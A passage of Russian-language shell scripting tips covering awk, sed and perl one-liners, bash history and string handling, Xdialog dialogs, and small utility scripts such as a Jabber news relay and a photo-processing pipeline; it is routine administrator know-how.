Часто для целей серверной автоматизации требуется генерация конфигурационных файлов. Предлагается использовать для этих целей следующую shell-конструкцию *BSD: #!/bin/sh config_file='test.conf' template_file='mytemplate' myvar1='variable 1' template=`cat ${template_file}` eval "echo \"${template}\"" > ${config_file} Linux: #!/bin/bash config_file='test.conf' template_file='mytemplate' myvar1='variable 1' template=`cat ${template_file}` eval "echo \"${template}\"" > ${config_file} Переменная template_file содержит путь к шаблону, остальные переменные - данные для шаблона. Последная строчка - ничто иное, как "движок" шаблонизатора, eval-вычисление строки-шаблона. Пример шаблона: myvar = ${myvar1} this is a \" quotes test \" $( if [ ! -z ${myvar2} ]; then echo "myvar2 is set and its value = ${myvar2}" fi ) Важно отметить, что в шаблоне следует экранировать кавычки. В шаблоне можно использовать не только подстановки значений, но и управляющие конструкции, заключенные в скобки (см. пример шаблона).

Сортировка стандартного вывода по длине строк Автор: pavlinux [комментарии]

Сортируем в порядке возрастания длины: cat /etc/passwd | awk '{print length, $0}' | sort -n | awk '{$1=""; print $0 }' или обратно cat /etc/passwd | awk '{print length, $0}' | sort -rn | awk '{$1=""; print $0 }'

Примеры использования Awk (доп. ссылка 1) [комментарии]

Использование сокращений. Конструкцию, используемую для вывода строк соответствующих заданной маске: awk '{if ($0 ~ /pattern/) print $0}' можно сократить до awk '/pattern/' Условие в awk может быть задано вне скобок, т.е. получаем: awk '$0 ~ /pattern/ {print $0}' По умолчанию, действия производятся со всей строкой, $0 можно не указывать: awk '/pattern/ {print}' print - является действием по умолчанию, его тоже можно не указывать. awk '/pattern/' Для вывода значения первого столбца строки, в которой присутствует маска LEGO: awk '/LEGO/ {print $1}' Для вывода значения первого столбца строки, во втором столбце которой присутствует маска LEGO: awk '$2 ~ /LEGO/ {print $1}' Для замены слова LIGO на LEGO и вывода только измененных строк можно использовать: awk '{if(sub(/LIGO/,"LEGO")){print}}' Но есть нужно выводить все строки (как sed 's/LIGO/LEGO/'), конструкцию можно упростить (1 - true для всех строк): awk '{sub(/LIGO/,"LEGO")}1' Вывести все строки, за исключением каждой шестой: awk 'NR % 6' Вывести строки, начиная с 6 (как tail -n +6 или sed '1,5d'): awk 'NR > 5' Вывести строки, в которых значение второго столбца равно foo: awk '$2 == "foo"' Вывести строки, в которых 6 и более столбцов: awk 'NF >= 6' Вывести строки, в которых есть слова foo и bar: awk '/foo/ && /bar/' Вывести строки, в которых есть слово foo, но нет bar: awk '/foo/ && !/bar/' Вывести строки, в которых есть слова foo или bar (как grep -e 'foo' -e 'bar'): awk '/foo/ || /bar/' Вывести все непустые строки: awk 'NF' Вывести все строки, удалив содержимое последнего столбца: awk 'NF--' Вывести номера строк перед содержимым: awk '$0 = NR" "$0' Заменим команды (пропускаем 1 строку, фильтруем строки с foo и заменяем foo на bar, затем переводим в верхний регистр и выводим значение второго столбца) cat test.txt | head -n +1 | grep foo | sed 's/foo/bar/' | tr '[a-z]' '[A-Z]' | cut -d ' ' -f 2 аналогичной конструкцией на awk: cat test.txt | awk 'NR>1 && /foo/{sub(/foo/,"bar"); print toupper($2)}' Использование диапазонов. Вывести группу строк, начиная со строки, в которой есть foo, и заканчивая строкой, в которой есть bar: awk '/foo/,/bar/' Исключив из вывода строки с вхождением заданных масок: awk '/foo/,/bar/{if (!/foo/ && !/bar/)print}' Более оптимальный вариант: awk '/bar/{p=0};p;/foo/{p=1}' Исключить только строку с завершающим вхождением (bar) awk '/bar/{p=0} /foo/{p=1} p' Исключить только строку с начальным вхождением (foo) awk 'p; /bar/{p=0} /foo/{p=1}' Разбиение файла по шаблонам. Имеется файл (file), в котором группы строк разделены шаблонами FOO1,FOO2 и т.д. Необходимо записать данные, находящиеся между метками FOO в разные файлы, соответствующие указанным в FOO номерам. awk -v n=1 '/^FOO[0-9]*/{close("out"n);n++;next} {print > "out"n}' file В GNU Awk можно сделать так: LC_ALL=C gawk -v RS='FOO[0-9]*\n' -v ORS= '{print > "out"NR}' file Парсинг CSV. По умолчанию в качестве разделителя используются пробел и табуляция. Чтобы определить иной разделитель, например запятую, нужно использовать FS=',' или опцию "-F". В качестве параметра может быть задано регулярное выражение, например, FS='^ *| *, *| *$' Но для разбора CSV это не подойдет, так как пробелы могут присутствовать и внутри трок, поэтому проще вырезать лидирующие пробелы перед и после запятой: FS=',' for(i=1;i<=NF;i++){ gsub(/^ *| *$/,"",$i); print "Field " i " is " $i; } Если в CSV данные помещены в кавычки, например "field1","field2", то подойдет такой скрипт: FS=',' for(i=1;i<=NF;i++){ gsub(/^ *"|" *$/,"",$i); print "Field " i " is " $i; } Но скрипт придется усовершенствовать для разбора полей вида: field1, "field2,with,commas" , field3 , "field4,foo" $0=$0","; while($0) { match($0,/[^,]*,| *"[^"]*" *,/); sf=f=substr($0,RSTART,RLENGTH); gsub(/^ *"?|"? *,$/,"",f); print "Field " ++c " is " f; sub(sf,""); } Проверка IPv4 адреса. awk -F '[.]' 'function ok(n) { return (n ~ /^([01]?[0-9]?[0-9]|2[0-4][0-9]|25[0-5])$/) } {exit (ok($1) && ok($2) && ok($3) && ok($4))}' Сравнение двух файлов. Вывод всех дублирующихся строк из двух неотсортированных файлах file1 и file2: awk '!($0 in a) {c++;a[$0]} END {exit(c==NR/2?0:1)}' file1 file2 Вывод только выделенных блоков текста. Например, чтобы показать из файла с текстом только текст, отмеченный как =текст= можно использовать: awk -v RS='=' '!(NR%2)' с форматированием переносов строк: awk -v RS='=' '!(NR%2){gsub(/\n/," ");print}'

Как хранить дату выполнения в истории команд bash (доп. ссылка 1) Автор: kpblca [комментарии]

По умолчанию bash, а точнее утилита history, не сохраняет в .bash_history время исполнения каждой команды. Почитал маны и оказалось, что в баше трейтье версии сделать это можно и весьма просто. Если объявить глобальную переменную HISTTIMEFORMAT с форматом выводимых данных, то утилита history будет сохранять и выводить эту дату. Итак, пишем в ~/.bashrc строчку export HISTTIMEFORMAT='%h %d %H:%M:%S ' После этого в .bash_history перед каждой командой появится коментарий с цифрой - временем выполнения этой команды в формате timestamp: #1198068550 history #1198139874 ьс #1198139876 mc #1198148168 ssh teletrade.ru #1198148217 ssh teletrade.ru А команда history будет выдавать историю данных с датой в формате, который мы переменной задали (в похожем формате выдают дату и время утилита ls): 995 Дек 19 15:49:10 history 996 Дек 20 11:37:54 ьс 997 Дек 20 11:37:56 mc 998 Дек 20 13:55:49 ssh teletrade.ru Но можно сделать и по ГОСТУ, в приятном русскому глазу виде "ДД.ММ.ГГГГ" export HISTTIMEFORMAT='%d.%m.%Y %H:%M:%S ' А можно и на американский манер "YYYY-MM-DD" export HISTTIMEFORMAT='%Y-%m-%d %H:%M:%S '

Отдельный файл истории работы в bash для пользователя работающего через SU (доп. ссылка 1) [комментарии]

Чтобы поместить в отдельный лог команды выполненные в режиме su: .bash_profile export HISTSIZE=3000 export HISTFILESIZE=99999 export HISTFILE=/root/.bash_hist-$(who am i|awk '{print $1}';exit) Получим два файла истории: .bash_hist-user и .bash_hist-root

Вертикальная конкатенация двух файлов (доп. ссылка 1) [обсудить]

Склеивание столбцов данных из файлов a.txt и b.txt, с разделителем пробел, производится командой: paste -D " " 1.txt 2.txt > 3.txt 1.txt: 1 1 2 2 3 3 2.txt: 4 5 6 3.txt: 1 1 4 2 2 5 3 3 6 paste -s -D " " 1.txt 2.txt > 3.txt 3.txt: 1 1 2 2 3 3 4 5 6

В чем отличие .bash_profile и .bashrc (доп. ссылка 1) [комментарии]

.bash_profile загружается только при входе пользователя в систему (консольный вход, ssh), в то время как .bashrc запускается для интерактивных сервисов выполняемых без логина (запуск xterm).

Пример работы с MySQL в bash скриптах Автор: Luc!f3r [комментарии]

Пример1: password='Your_MySQL_Password' MYSQL_RESULT=`mysql -e "SELECT tables_col FROM table_name" -- password="$password" database_name|grep -v tables_col|xargs|sed "s/ /\n/g"` for i in $MYSQL_RESULT; do echo $i done; Пример2: mysql -sse "SELECT col FROM table" -p"$password" database | while read i do echo $i done Комментарий 1: Пароль лучше передавать через переменную окружения MYSQL_PWD, чтобы он не светился в выводе ps. Комментарий 2 (от myhand): Другой вариант передача пароля через локальный файл конфигурации .my.cnf, размещенный в корне домашней директории пользователя: Пример .my.cnf: [client] user = имя_пользователя password = пароль host = хост_БД [mysql] database = имя_бд

Как определить смещение в часах для текущей временной зоны в Perl и Shell [обсудить]

Perl: use POSIX (strftime); my $tz = strftime("%z", localtime); $tz =~ s/(\d\d)(\d\d)/$1/; Shell: date +%z|sed 's/[0-9][0-9]$//'

Как использовать графические диалоговые окна в shell скриптах (доп. ссылка 1) [обсудить]

Выбор Yes или No (результат в $?, 0 - yes, 1 - no, 255 - закрыто окно), "0 0" - размер окна по умолчанию: Xdialog --title "Title" --yesno "Test or not" 0 0 Вывести окно с текстом (60 - это таймаут для отображения окна): Xdialog --msgbox "text splitting\ntest..." 0 0 Xdialog --infobox "text splitting\ntest..." 0 0 60 Запросить текст от пользователя, по умолачнию выдать test: user_text=`echo "test" | Xdialog --editbox "-" 0 0` Показать, что выполнено 15% работы (--progress принимает накопительные данные) (новые значения посылаются через stdin, как только будет больше 100 окно закроется): Xdialog --gauge "test" 0 0 15 Xdialog --progress "test" 0 0 100 Ввод строки от пользователя (введенная строка помещается в stdout): Xdialog --inputbox "test" 0 0 "string" Ввод логина и пароля (в stduot - login/password): Xdialog --password --2inputsbox "test" 0 0 "Login" "guest" "Password" "" Выбор элемента из списка: Xdialog -combobox "test" 0 0 "Test1" "Test2" "Test3" Выбор диапазона (от 1 до 10): Xdialog -rangebox "test" 0 0 1 10 Показывать в окне растущий хвост файла file.txt: Xdialog --tailbox file.txt 0 0 Xdialog --logbox file.txt 0 0 Выбор файла или директории Xdialog --fselect def_file.txt 0 0 Xdialog --dselect def_dir 0 0 Показать 5 июня на календаре Xdialog --calendar "test" 0 0 5 6 2005

Памятка по командам SED (доп. ссылка 1) Автор: madskull [обсудить]

a \text - Добавить "text" после указанной строки (вывести), потом считать следующую. b label - Перейти на метку, устанавливаемую, с помощью функции ":" , если label пуст, то перейти в конец скрипта. c \text - Удалить pattern space и вывести "text" на output . d - Удалить pattern space . D - Удалить pattern space до вставленной newline . g - Заместить содержимое pattern space содержимым буфера hold space . G - Добавить к содержимому pattern space содержимое буфера hold space . h - Заместить содержимое буфера hold space на содержимое pattern space . H - Добавить к содержимому буфера hold space содержимое pattern space . i \text - Вывести текст на output перед указанной строкой. n - Вывести pattern space на output и считать следующую строку. N - Добавить следующую строку к pattern space , разделяя строки вставленным newline . p - Скопировать pattern space на output . P - Скопировать pattern space до первой вставленной newline на output . q - Переход на конец input . Вывести указанную строку, (если нет флага -n ) и завершить работу SED r rfile - Читать содержимое rfile и вывести его на output прежде чтения следующей строки. t label - Перейти на метку, устанавливаемую с помощью функции ":" , если для этой строки была осуществлена замена с помощью функции "s" . Флаг осуществления замены восстанавливается при чтении следующей строки или при выполнении функции "s" . w wfile - Добавить pattern space к концу файла wfile . (Максимально можно использовать до 10 открытых файлов.) x - Поменять местами содержимое pattern space и буфера hold space . ! func - Применять функцию func (или группу функций в {} ) к стокам НЕ попадающим в указанные адреса. : label - Устанавливает метку для перехода по "b" и "t" командам. = - Выводит номер строки на output как строку. { - Выполняет функции до "}" , только когда выбрано pattern space . Группировка функций. # - Комментарий. "#n" в скрипте равносильно установке флага -n Примеры: Выдираем ссылки из документа cat index.html | sed -n 'H;${x;s/\n//g;s/ [hH][rR][eE][fF]=/\n/g;p}' | # делаем ссылки в начале строки sed 's/[ >].*//;s/"//g'# обрубаем концы и легкая косметика Аналог dos2unix $ sed -i 's/\r//' file Убрать переводы строк в тексте $ sed -ni 'H;${x;s/\n//g;p}' file

Работа со строками в bash (доп. ссылка 1) Автор: madskull [обсудить]

${#string} - Длина строки Извлечение подстроки ${string:position} - с position до конца ${string:position:length} - с position длиной length символов ${string: -length} - последние length символов Удаление части строки ${string#substring} - до первого с начала ${string##substring} - до последнего с начала ${string%substring} - до первого с конца ${string%%substring} - до последнего с конца Замена подстроки ${string/substring/replacement} - первое вхождение ${string//substring/replacement} - все вхождения ${var/#Pattern/Replacement} - Если в переменной var найдено совпадение с Pattern, причем совпадающая подстрока расположена в начале строки (префикс), то оно заменяется на Replacement. Поиск ведется с начала строки ${var/%Pattern/Replacement} - Если в переменной var найдено совпадение с Pattern, причем совпадающая подстрока расположена в конце строки (суффикс), то оно заменяется на Replacement. Поиск ведется с конца строки Пример: a="12345"; echo "${a}"; echo "${a:3}"; echo "${a#12}"; echo "${a/12/21}"

Получение строки случайных символов в Shell Автор: uncknown [комментарии]

Пригодится, например, для создания временных файлов: FreeBSD: head -c 15 /dev/random | md5 | tail -c 10 Linux: head -c 15 /dev/random | md5sum | head -c 10

Пример математических операций в shell используя bc (доп. ссылка 1) [комментарии]

echo "(321-123)/123" | bc -l echo "framing=20; minsize=64; (100*10^6)/((framing+minsize)*8)" | bc Рисование графика echo "framing=20; plot [64:1518] (100*10* *6)/((framing+x)*8)" | gnuplot -persist Преобразование из десятичного в шестнадцатеричный вид echo "obase=16;ibase=10;123" | bc

Скрипт для удаленного редактирования файлов Автор: spanka [комментарии]

#!/bin/sh tmp_file=`mktemp /tmp/scp_vi.XXXXXXXXXX` cp /dev/null $tmp_file scp $1 $tmp_file vi $tmp_file scp $tmp_file $1 rm -f $tmp_file запускать так: rvi login@host:/patch/to/file В vim можно писать "vim scp://user@host.ru:/home/user/file"

Вывод времени в заданном формате в Shell [комментарии]

Для записи в переменную cur_date времени в формате год-месяц-день-час-минута: cur_date=`date \+\%Y_\%m_\%d_\%H_\%M`

Как в Shell выполнить определенное действие сразу после обновления файла (доп. ссылка 1) [обсудить]

fileschanged -r /shared/source/tree | while read fd; do stat -format="%n modified by %U at %y" $fc done fileschanged - http://fileschanged.sourceforge.net

Как отделить имя файла от расширения в bash и freebsd sh (доп. ссылка 1) [комментарии]

Заменяем расширение .wav на .mp3: file_name="file.wav" echo ${file_name%%.wav}.mp3

Пример использования eval и разбор параметров на Shell [обсудить]

control_param="test1 test2" num_test1="123" num_test2="456" for cur_item in $control_param; do eval num_val=\$num_$cur_item done

Как определить сумму столбца цифр в файле. [обсудить]

Суммируем 3-й столбец из лог файла. cat logfile| awk '{s += $3} END {print s}'

Цикл с счетчиком итераций на Shell [комментарии]

min_num=2 max_num=10 i=$min_num while [ $i -le $max_num ]; do echo "$i" i=$[i+1] # в зависимости от shell также подходит i=$(($i + 1)) или i=`expr $i + 1` done

Как пропарсить примитивный файл конфигурации на Shell (чтение файла с разбивкой по столбцам) ? [обсудить]

cat config.txt| grep -v '^ *#'| while read param1 param2; do echo "$param1 - $param2" done

Как в sh определить число символов в строке Автор: Soldier [комментарии]

В FreeBSD sh и bash: test="string" len=${#test} ##Длина строки test char1='t' ##Первый символ для поиска pos1='echo $test | awk -vs=${char1} '{print index($0,s);}'' ##pos1=2 - найден

Специфичные особенности удаления элементов массивов в Bash Автор: Омельянович Евгений [комментарии]

В руководствах Bash упоминается, что команда "unset name[N]" выполняет удаление элемента массива, например: https://www.gnu.org/software/bash/manual/html_node/Arrays.html#Arrays The unset builtin is used to destroy arrays. unset name[subscript] destroys the array element at index subscript. https://tldp.org/LDP/abs/html/arrays.html unset colors[1] # Remove 2nd element of array. https://www.opennet.dev/docs/RUS/bash_scripting_guide/c12790.html unset colors[1] # Удаление 2-го элемента массива. Данное описание не соответствует действительности, так как элемент массива для корректного удаления необходимо заключить в кавычки '..' Для конкретного примера: unset 'colors[1]' Если не использовать кавычки, то bash попытается сделать расширение имени и заменит "unset colors[1]" на "unset colors1". Проверить это можно выполнив: > touch colors1 > bash example_25_3.sh

Как преобразовать имена файлов из верхнего регистра в нижний Автор: lavr [комментарии]

for i in `ls`; do mv "$i" `echo "$i" | tr "[:upper:]" "[:lower:]"`; done

Результат ping в скриптах Автор: Белоусов Олег [комментарии]

ping -c 2 host_name if [ $? !=0]; then echo "Not ping!" else echo "Work normal" fi

Готовые скрипты

Автоматизация отправки сообщений в Jabber на примере трансляции новостей с OpenNet (доп. ссылка 1) Автор: Nvb13 [комментарии]

Введение Получаем новости с сайта OpenNet.ru в Jabber с возможностью шифрования OpenPGP. Исходники #!/bin/bash ################################# # # # Opennet.ru Jabber # # News Parser # # # ################################# ### Login/Pass/Server of bot #### Jid="" # Only login: test Pass="" # Password JServer="" # Exapmle.com ################################# ### Jid/PGP key of recipient #### Send_to="" # Jid: test@example.com Crypt="1" # Encrypt with OpenPGP or not: 1,0 Key_Name="" # PGP key name: my_key ################################# sqlite3=`which sqlite3` DB_FILE=./opennet_db.db $sqlite3 $DB_FILE " create table IF NOT EXISTS news ( id integer primary key autoincrement, News TEXT UNIQUE);" # Get news from Opennet.ru, and remove trash curl -s https://www.opennet.dev/opennews/opennews_3.txt | iconv -f koi8-r \ | cut -d '<' -f 8 | cut -d '"' -f 2,3 | sed 's/"//g' | sed 's/>/ /g' > /tmp/opennet_temp.txt # Wrirt news to database while read line do $sqlite3 $DB_FILE "insert into news (News) values ('""$line""')" if [ $? == "0" ];then # If news not in database, encrypt it and send it to recipient if [ "$Crypt" == 1 ]; then msg=$(echo "$line" | gpg -e -r "$Key_Name" --armor | grep -v 'PGP MESSAGE' | grep -v '^$') msg_tmp="/tmp/$(( ( RANDOM % 25400 ) + 1 ))" echo "<message to='$Send_to' from='$Jid@$JServer' type='chat'>" >> $msg_tmp echo "<body>This message is encrypted.</body>" >> $msg_tmp echo "<x xmlns='jabber:x:encrypted'>$msg</x>" >> $msg_tmp echo "</message>" >> $msg_tmp cat $msg_tmp | sendxmpp -u "$Jid" -p "$Pass" -j "$JServer" -t --raw else #Send not encrypted message echo "$line" | sendxmpp -u "$Jid" -p "$Pass" -j "$JServer" -e -t "$Send_to" fi fi sleep 2 done < "/tmp/opennet_temp.txt" rm -rf /tmp/opennet_temp.txt "$msg_tmp" exit 0; Актуальный исходный код и инструкцию по установке можно загрузить на странице https://github.com/nvb13/OpenNet_to_xmpp Установка Для работы скрипта требуются sendxmpp, sqlite3, curl apt-get install sendxmpp sqlite3 curl git clone https://github.com/nvb13/OpenNet_to_xmpp.git cd OpenNet_to_xmpp/ chmod +x opennet_xmpp.sh Настройка Зарегистрируйте Jabber аккаунт бота на любом сервере. Заполните поля в файле opennet_xmpp.sh Jid="" # Логин бота без собаки и хоста. Pass="" # Пароль бота JServer="" # Сервер бота Send_to="" # Jabber ID получателя куда будут приходить новости test@example.com Crypt="1" # Шифровать сообщения с OpenPGP или нет. Значения 1 или 0 Key_Name="" # Имя вашего PGP ключа. Например my_key Если используете шифрование, то импортируйте публичный ключ получателя. gpg --import key_file.asc где key_file.asc файл публичного ключа получателя Проверьте работу скрипта ./opennet_xmpp.sh Если все работает добавьте задание в cron crontab -e */30 * * * * /home/username/OpenNet_to_xmpp/opennet_xmpp.sh

Автоматическое блокирование экрана при отдалении от компьютера мобильного телефона (доп. ссылка 1) [комментарии]

Ниже представленный скрипт позволяет организовать автоматический вызов блокировщика экрана при отдалении от компьютера мобильного телефона. В качестве фактора вызова блокировщика используется пропадание указанного устройства Bluetooth из области видимости. Для определения MAC-адреса и имени устройства, следует использовать утилиту: hcitool scan Код скрипта: #!/bin/bash DEVICE=MAC-адрес Bluetooth-устройства DEV_NAME="Имя устройства" INTERVAL=5 # in seconds # The xscreensaver PID XSS_PID= # Start xscreensaver if it's not already running pgrep xscreensaver if [ $? -eq 1 ]; then echo "Starting xscreensaver..." xscreensaver & fi # Assumes you've already paired and trusted the device while [ 1 ]; do opt=`hcitool name $DEVICE` if [ "$opt" = "$DEV_NAME" ]; then echo "Device '$opt' found" if [ -n "$XSS_PID" ]; then echo "Killing $XSS_PID" kill $XSS_PID XSS_PID= fi else echo "Can't find device $DEVICE ($DEV_NAME); locking!" xscreensaver-command -lock XSS_PID=$! fi sleep $INTERVAL done

Определение типа окончания строк (Windows или Unix) для текстовых файлов в небольшом Web-проекте Автор: Kroz [комментарии]

Ситуация: небольшой Web-проект разрабатывается несколькими людьми на разных ОС: Windows и Linux. В результате в некоторых файлах перевод строк сделан в стиле Windows, в некоторых - в стиле Unix. Неудобство состоит в том, что если какая-то "интеллектуальная" программа поменяет тип перевода строк, система контроля версий Subversion помечает все строки как изменившиеся, и нужны дополнительные усилия чтобы определить реальные изменения. Поэтому было принято решение определить тип перевода строк в каждом файле, и применить соответствующие меры (например, использовать атрибут svn:eol-style в subversion). Скрипт простой, легко кастомизируется под автоматическую конвертацию (с помощью dos2unix), другие типы файлов, определение стиля Macintosh (в данном случае различается только Windows и Unix): for FILE in `find -iname '*.php' -or -iname '*.css' -or -iname '*.js' -or -iname '*.txt' -or -iname '*.xml'` ; do echo -n "$FILE ... " ; WIN=`grep -P "\\r$" $FILE | head`; if [ -z "$WIN" ] ; then echo "Unix" else echo "Windows" fi done

Автоматическое определение в Linux количества процессорных ядер из скрипта Автор: Карбофос [комментарии]

Данный подход можно применять для обработки данных на компьютерных системах с разным количеством процессорных ядер и использовать для параллелизации обработки данных по усмотрению. Пример скрипта с использованием cppcheck (статический анализ исходников в несколько потоков, опция -j) Пример скрипта с использованием cppcheck #!/bin/sh COUNT=$(cat /proc/cpuinfo | grep 'model name' | sed -e 's/.*: //' | wc -l) echo "number of detected CPUs =" $COUNT cppcheck -j $COUNT --force --inline-suppr . 2>errors.txt вариант от Vee Nee COUNT=$(lscpu -p=cpu | grep -v \\# | wc -l) вариант от pavlinux: COUNT=$(getconf _NPROCESSORS_ONLN) дополнение от Andrey Mitrofanov: COUNT=$(egrep -c '^processor' /proc/cpuinfo)

Автоматическая обработка фотографий Автор: Карбофос [комментарии]

После покупки сканера для фотоплёнок и его применения у меня возникло несколько сложностей: 1. переименование последовательности фотографий в случае сканирования в обратном порядке 2. автоматическое переворачивание фотографий относительно какой-то оси. Если фотография вверх ногами, то это можно разобрать сразу, но если у изображений перепутаны стороны, то такое бросается в глаза далеко не сразу. Например, это заметно только по одной-двум фотографиям из всей плёнки. 3. автоматическая обработка мелких дефектов в конвейере, с наиболее полным использованием ядер процессора Для реверсивной последовательности списка имён файлов и изменения в нормальную я написал этот скрипт #!/bin/bash # # reversenames.sh # # маска для моих файлов после сканирования DEFMASK="*.JPG" REVLIST=$(ls -r *.JPG) REVARRAY=($REVLIST) # только до половины списка обрабатывать len=`expr ${#REVARRAY[@]} / 2` echo "$len" j=0 for i in $DEFMASK; do if [ ! -e $i ]; then echo "Error: current directory must contain files with the mask $MASK" echo exit 1 fi echo "rename $i -> ${REVARRAY[j]}" mv $i $i.old mv ${REVARRAY[j]} $i mv $i.old ${REVARRAY[j]} j=`expr $j + 1` if [ $j -eq $len ]; then break fi done echo "ready" Для случая, когда нужно поменять стороны фотографий местами я дополнил скрипт, найденный в интернете для кручения фотографий на определённый угол. Вот расширенная версия этого скрипта: #!/bin/bash # # jpegsrotate.sh # if [ -z `which jpegtran` ]; then usage echo "Error: jpegtran is needed" echo exit 1 fi shopt -s extglob DEFMASK="*.JPG" DEFEVENMASK="*[02468].JPG" DEFODDMASK="*[13579].JPG" FLIPMASK="" DEFDEG=270 function usage() { echo echo "usage:" echo "$0" echo " rotates files with the mask $DEFMASK by $DEFDEG degrees clockwise" echo "$0 --even" echo " rotates even files with the mask $DEFEVENMASK by 180 degrees" echo "$0 --odd" echo " rotates odd files with the mask $DEFODDMASK by 180 degrees" echo "$0 --params \"REGEXP\" (90|180|270)" echo " rotates files with the mask REGEXP by the given aspect ratio clockwise" echo "$0 --flip [h|v]" echo " flip pictures horizontal or vertical" echo } if [ "$1" == "--even" ]; then MASK=$DEFEVENMASK DEG=180 elif [ "$1" == "--odd" ]; then MASK=$DEFODDMASK DEG=180 elif [ "$1" == "--flip" ]; then MASK=$DEFMASK if [ "$2" == "v" ]; then FLIPMASK="vertical" else FLIPMASK="horizontal" fi elif [ "$1" == "--params" ]; then if [ -n "$2" -a -n "$3" ]; then MASK=$2 DEG=$3 else usage exit 1 fi elif [ -n "$1" ]; then usage exit 1 else MASK=$DEFMASK DEG=$DEFDEG fi echo $MASK for i in $MASK; do if [ ! -e $i ]; then usage echo "Error: current directory must contain files with the mask $MASK" echo exit 1 fi echo "$i" if [ "$1" == "--flip" ]; then jpegtran -flip $FLIPMASK $i > $i.flipped mv $i.flipped $i else jpegtran -rotate $DEG $i > $i.rotated mv $i.rotated $i fi done Скрипт нужно вызвать следующим образом (флипнуть по горизонтали): ./jpegsrotate.sh --flip h Как видно, необходимо наличие программы jpegtran. Третий пункт с автоматической обработкой самый интересный. Для этих целей я выбрал программу ImageMagick не по каким-то причинам. Позже я испробую подобную обработку с GIMP, но в этот раз я использовал достаточно интересный ресурс со скриптами для обработки изображений http://www.fmwconcepts.com/imagemagick с кучей примеров и результатов обработки при вызове скриптов с определёнными параметрами. Затем я использовал готовый скрипт для циклической обработки графических файлов в директории. Скрипт взял здесь. Но несколько его видоизменил для использования нескольких ядер процессора. #!/bin/bash # loop_for_fotos.sh # #проверяем, установлен ли convert convert > /dev/null if [ $? -ne 0 ] ; then echo "Error: convert is needed, it's a part of ImageMagick" ; fi; DIR=$1; # велосипед, убирающий "/" в конце if [ -z $1 ]; then $DIR=`pwd`; else TEMP=`pwd`; cd $DIR; TEMP2=`pwd`; cd $TEMP; DIR=$TEMP2; echo $TEMP2; fi; #наши старые файлы копируем в DIR.orig echo $DIR mkdir $DIR/orig; for i in `ls $DIR/*.JPG`; do cp $i orig/; done; ERR=0; CPUS=1; echo "Start in " $DIR files=$(ls $DIR/*.JPG) list=($files) len=${#list[@]} echo $len for(( i=0; i<$len ; i=i+$CPUS)) do for(( j=0; j<$CPUS ; j++)) do if [ ${list[i+j]} ]; then ./denoise -f 2 -s "20x20+203+152" ${list[i+j]} ${list[i+j]}.den.jpg && ./isonoise -r 5 ${list[i+j]}.den.jpg ${list[i+j]}.iso.jpg & fi done; for job in `jobs -p` do echo $job wait $job || let "FAIL+=1" done; if [ $? -eq 0 ]; then echo "denoise, isonoise successfully ;) next step"; else ERR=$[$ERR+1]; #считаем ошибки fi; for(( j=0; j<$CPUS ; j++)) do if [ ${list[i+j]} ]; then rm ${list[i+j]}.den.jpg fi done; done; CPUS=2; echo "Start in brightness calibration" for(( i=0; i<$len ; i=i+$CPUS)) do for(( j=0; j<$CPUS ; j++)) do if [ ${list[i+j]} ]; then ./omnistretch -m HSB -ab 1 -s 1.5 ${list[i+j]}.iso.jpg ${list[i+j]} & fi done; for job in `jobs -p` do echo $job wait $job || let "FAIL+=1" done; if [ $? -eq 0 ]; then echo "omnistretch successfully ;) next step"; else ERR=$[$ERR+1]; #считаем ошибки fi; for(( j=0; j<$CPUS ; j++)) do if [ ${list[i+j]} ]; then rm ${list[i+j]}.iso.jpg fi done; done; if [ $ERR -eq 0 ]; then echo "Job done!"; else echo "Job done with some errors."; fi; echo "You can find your old files in $DIR.orig" #end Вызываем скрипт с параметром "." для актуального директория, где находятся наши фотографии. В первом цикле я использовал вызов двух скриптов ./denoise -f 2 -s "20x20+203+152" ${list[i+j]} ${list[i+j]}.den.jpg \ && ./isonoise -r 5 ${list[i+j]}.den.jpg ${list[i+j]}.iso.jpg для последовательного отфильтровывания небольших дефектов. В этих скриптах задействованы оба ядра, поэтому для цикла обработки использовалась переменная CPUS=1, если в вашем процессоре четыре ядра, то можете увеличить значение в два раза и т.д. Для цикла обработки яркости ./omnistretch -m HSB -ab 1 -s 1.5 ${list[i+j]}.iso.jpg ${list[i+j]} & уже использовалось вызов двух скриптов одновременно, т.к. при вызове одного используется только одно ядро. Поэтому значению переменной CPUS перед циклом было присвоено 2. Конечно, скрипт можно несколько улучшить, встроив автоматическое распознание количества ядер в системе. Но это уже - по желанию.

10 полезных опций для написания однострочников на языке Perl (доп. ссылка 1) [комментарии]

В простейших случаях perl можно использовать в командной строке как замену grep и sed, например: perl -ne 'print if /foo/' perl -pe 's/foo/bar/' Но существует ряд интересных особенностей, которые часто упускаются из виду: Опция "-l" При добавлении опции "-l" perl автоматически очищает символ перевода строки перед обработкой в скрипте и добавляет его при каждом выводе данных. Например, для очистки завершающих каждую строку файла пробелов можно использовать: perl -lpe 's/\s*$//' (если указать perl -pe 's/\s*$//', то будут удалены и символы перевода строки) Опция "-0" По умолчанию perl разбивает входящий поток на строки, обрабатывая каждую строку отдельно. Опция "-0" позволяет выполнить операцию над файлом целиком, без разбиения на строки по символу перевода строки, а с разбиением на блоки по нулевому символу (так как в текстовых файлах \0 не встречается можно использовать -0 для обработки всего файла разом). Например, для удаления из текущей директории всех файлов, имена которых начинаются с тильды, можно использовать: find . -name '*~' -print0 | perl -0ne unlink Опция "-i" При указании "-i" perl считывает поток данных из указанного в командной строке файла, а затем записывает в него же результат работы, заменяя его. В качестве аргумента можно указать расширение для создания резервной копии файла. Например для удаления всех комментариев в скрипте script.sh можно использовать: perl -i.bak -ne 'print unless /^#/' script.sh На случай ошибки, старая версия файла будет сохранена в script.sh.bak. Оператор ".." Для оперировании с диапазоном строк необходимо учитывать состояние прошлых вычислений, для чего можно использовать оператор "..". Например, для раздельной выборки всех GPG-ключей из одного файла, выводя только данные, идущие между указанным заголовком и футером, можно использовать: perl -ne 'print if /-----BEGIN PGP PUBLIC KEY BLOCK-----/../-----END PGP PUBLIC KEY BLOCK-----/' FILE Опция "-a" При указании опции "-a" perl автоматически разбивает каждую строку на части, по умолчанию используя пробел в качестве разделителя, и помещает ее элементы в массив @F. Например, для вывода 8 и 2 столбца можно использовать: ls -l | perl -lane 'print "$F[7] $F[1]"' Опция "-F" Опция "-F" позволяет указать символ разделителя для разбиения строки при использовании опции "-a". Например, для разбиения не по пробелу, а по двоеточию, нужно указать: perl -F: -lane 'print $F[0]' /etc/passwd Оператор "\K" При указании "\K" внутри регулярного выражения, можно отбросить все ранее найденные совпадения, что позволяет упростить операции по замене данных без задействования переменных. Например, для замены поля "From:" в тексте email можно 